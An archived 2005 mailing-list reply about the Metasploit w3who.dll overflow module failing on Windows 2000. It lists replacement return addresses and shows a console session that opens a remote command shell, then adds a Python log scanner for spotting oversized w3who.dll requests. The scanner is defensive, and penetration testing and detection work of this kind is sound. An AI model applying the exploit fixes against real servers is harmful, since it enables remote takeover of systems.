From: H D Moore (sflist@digitaloffense.net)
Date: Sat Jan 15 2005 - 02:56:01 EST
The return address for Windows 2000 fails because the ImageBase for the
DLL is different. I forgot to check the base address on 2000 after fixing
the code to work on Windows XP SP2 :-(
A new module will be posted to metasploit.com shortly. In the meantime,
just change the return address in the Targets section to one of the
following:
0x01169f4a (pop eax, pop ebp, ret @w3who.dll w/base 0x01150000)
0x75022ac4 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
0x750236b1 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
If you run into any other bugs or reliability problems with the Metasploit
Framework, *please* drop us an email at msfdev[at]metasploit.com :-)
-HD
---
msf iis_w3who_overflow(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 RESKIT DLL (Win2000)
[*] Sending 8254 bytes to remote host.
[*] Waiting for a response...
[*] Got connection from 192.168.0.100:34885 <-> 192.168.0.237:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

On Friday 14 January 2005 02:49, Martin Bernhard wrote:
> Hi,
>
> As one of our clients is running some IIS web servers with w3who.dll on
> them, I figured that this would be a good place to start our pen test.
> Unfortunately, the exploit in the new release of the Metasploit
> Framework did not work on the most important servers (Windows 2000). I
> have access to a test system that gives me the opportunity to analyze
> the bug in detail, but I can’t figure out what parts in memory are
> overwritten. Does anybody know what exactly I have to do to trigger the
> bug and analyze it (I’m using ollydbg)?
>
> Any help is much appreciated
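For the defender side of this thread: the session above shows the module sending an 8254-byte request to the w3who.dll ISAPI extension, which is far larger than any legitimate use of that DLL needs. The script below is an added example (not part of the original message, not Metasploit code) that scans IIS W3C extended log entries and flags requests to w3who.dll whose client request size exceeds a threshold. The log lines are constructed for the example, the 2048-byte threshold is an assumed heuristic, and the only field names relied on are standard W3C ones (cs-uri-stem, cs-bytes).

```python
"""Flag oversized requests to the w3who.dll ISAPI extension in IIS W3C logs.

Added example, not from the original thread. Assumes the W3C extended log
format with a '#Fields:' header; the request size threshold is a heuristic
chosen here (the thread reports an 8254-byte exploit payload).
"""
from typing import Dict, Iterator, List

# Heuristic threshold (assumption): any request to w3who.dll larger than
# this is suspicious. Normal w3who.dll usage is a short GET with little or
# no query string.
MAX_BENIGN_BYTES = 2048

# Constructed sample log (made up for this example). The last entry mimics
# a request whose size matches the 8254 bytes reported in the thread.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-bytes",
    "2005-01-14 02:49:10 192.168.0.100 GET /scripts/w3who.dll - 200 312",
    "2005-01-14 02:49:11 192.168.0.100 GET /default.htm - 200 9001",
    "2005-01-14 02:49:12 192.168.0.100 GET /scripts/w3who.dll " + "A" * 64 + " 500 8254",
])


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per log entry, keyed by the names in the #Fields header."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue  # other directives (#Software, #Date, ...) carry no entries
        values = line.split()
        if len(fields) != len(values):
            continue  # malformed entry; skip rather than mis-align columns
        yield dict(zip(fields, values))


def find_suspicious(text: str, threshold: int = MAX_BENIGN_BYTES) -> List[Dict[str, str]]:
    """Return entries that target w3who.dll and exceed the request-size threshold."""
    hits: List[Dict[str, str]] = []
    for entry in parse_w3c(text):
        stem = entry.get("cs-uri-stem", "").lower()
        if not stem.endswith("/w3who.dll"):
            continue
        try:
            size = int(entry.get("cs-bytes", "0"))
        except ValueError:
            continue  # '-' or garbage in the size column; nothing to compare
        if size > threshold:
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"{hit['date']} {hit['time']} {hit['c-ip']} -> "
              f"{hit['cs-uri-stem']} ({hit['cs-bytes']} bytes, status {hit['sc-status']})")
```

Run against a real log by reading the file into `find_suspicious`; the 9001-byte request to default.htm in the sample is deliberately not flagged, since the check is scoped to the vulnerable extension rather than to large requests in general. Removing w3who.dll from servers that do not need it is the simpler fix; the detector is for the interval before that happens.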
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:13 EDT